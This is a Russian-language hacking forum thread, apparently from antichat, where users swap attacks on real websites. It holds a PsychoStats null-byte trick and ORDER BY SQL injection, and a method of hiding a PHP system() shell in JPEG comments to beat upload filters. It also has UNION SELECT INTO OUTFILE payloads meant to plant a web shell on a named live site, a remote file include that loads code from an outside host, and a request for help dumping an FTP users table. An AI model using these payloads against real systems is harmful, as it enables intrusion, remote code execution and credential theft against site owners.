я посмотрел чтоэто за "сплоит", на багртаках написано - information disclosure)) как ты "запоганил статистику" ?
Да подставляю "server.php?newcss=styles.css&newtheme=%00" и все ппц =) Одни ошибки при заходе на стату %)
Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции
Piflit, по ссылке только про xss написано... Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\
Покапался нашел скул после order by player.php?id=11&ssort=(-skill*(-1))&sorder=desc player.php?id=11&ssort=(-skill)&sorder=desc Выводятся скиллы упарядоченные от большего к меньшему и наоборот. Да, там точно скул есть. ssort=(-skill*(1=1))-- обрезание запроса
Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
Про расширения тут глянь: https://forum.antichat.ru/threadnav23501-1-10.html _)))))) В <?php ?> наверно Открываешь картинку редактором(по вкусу) и дописываешь в конец...
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
Подобрал - HTML: http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/* Хочу залить шел - HTML: http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/* Не получается! 1) В заппосе что то не так или прав на зипись нету? 2) В слепой инжекции можно шел залить?
Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.
1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое 2 - можно. Разницы то никакой нет
лол http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e61726f642e72752f616e746963686174/*&id=0&id_=-0.015 в другом параметре запрос с 1 столбцом из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php 0x687474703a2f2f7a69726f6461792e6e61726f642e72752f616e746963686174 это переведённое в хекс http://ziroday.narod.ru/antichat вот и всё =) ЗЫ В папку forum есть запись
Спудер опередил... ОФФТОП: В странице индекс.пхп : Code: if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo(" // <SCRIPT type='text/javascript'> // alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.'); // window.location='http://www.pornushka.ru'; // </SCRIPT> // ");} Вот это рыбаки!!! ))))))))))) P.S ничего не дефейсить. Убью.
запрос выдает как теперь вывести содержимое этой таблицы users из бд pure-ftpd? (мешает '-' ), т.к. таблица users уже есть в другой бд и запрос from+users выдает другую инфу.